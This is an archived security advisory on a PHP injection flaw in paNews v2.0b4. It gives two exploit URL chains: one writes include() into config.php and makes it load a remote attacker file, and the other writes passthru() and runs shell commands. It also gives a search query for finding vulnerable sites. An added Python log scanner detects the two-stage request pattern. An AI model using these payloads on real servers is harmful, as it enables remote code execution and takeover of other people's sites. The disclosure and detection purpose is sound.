paNews v2.0b4 - PHP Injection

2005-02-21T00:00:00
ID SECURITYVULNS:DOC:7876
Type securityvulns
Reporter Securityvulns
Modified 2005-02-21T00:00:00

Description


* Network security team
* nst.e-nex.com
*****
Title: paNews v2.0b4
Bug found by: тёмыч
Date: 20.02.2005
*****

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection

The bug works only if:
1. register_globals=On
2. the includes folder has write permissions set

p.s. turn off JavaScript =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php

Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id
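
A log check for the two-step request pattern shown in Example 1 and Example 2, added here as an example and not part of the original advisory. The Apache combined-log format, the sample lines, the finding labels and the function names are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (format assumed), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2005:10:00:01 +0000] "GET /panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&showcopy=include($nst) HTTP/1.1" 200 512
203.0.113.5 - - [21/Feb/2005:10:00:09 +0000] "GET /panews/includes/config.php?nst=http://remote.example/file.php HTTP/1.1" 200 90
198.51.100.7 - - [21/Feb/2005:10:02:00 +0000] "GET /panews/index.php?id=4 HTTP/1.1" 200 4096
198.51.100.9 - - [21/Feb/2005:10:03:00 +0000] "GET /panews/includes/admin_setup.php?access%5B%5D=admins&do=updatesets&showcopy=passthru%28%24nst%29 HTTP/1.1" 200 512
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic for PHP code in a settings value: a variable reference or a call.
CODE_IN_VALUE = re.compile(r"\$\w+|\w+\s*\(")

def classify(target):
    """Label one request target, or return None when it matches neither stage."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes too
    path = parts.path.lower()
    if path.endswith("/includes/admin_setup.php") and "updatesets" in params.get("do", []):
        # Stage 1: a settings update sent straight to the include file.
        settings = [v for k, vs in params.items()
                    if k != "do" and not k.startswith("access") for v in vs]
        if any(CODE_IN_VALUE.search(v) for v in settings):
            return "settings-write-with-code"
        return "settings-write-direct"
    if path.endswith("/includes/config.php") and params:
        return "config-direct-params"  # stage 2: written config requested directly
    return None

def scan(log_text):
    """Return (client, label) for every suspicious request, in log order."""
    hits = ((m.group(1), classify(m.group(2)))
            for m in map(REQUEST.match, log_text.splitlines()) if m)
    return [(client, label) for client, label in hits if label]

def chained_clients(findings):
    """Clients that wrote settings and later requested config.php directly."""
    wrote, chained = set(), []
    for client, label in findings:
        if label.startswith("settings-write"):
            wrote.add(client)
        elif client in wrote and client not in chained:
            chained.append(client)
    return chained

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), chained_clients(scan(SAMPLE_LOG)))
```

A hit is a reason to check the two conditions the advisory names, register_globals=On and a writable includes folder, since both must hold for the requests to have any effect. Parameters sent in a POST body do not appear in access logs, so this only covers the GET form used in the examples.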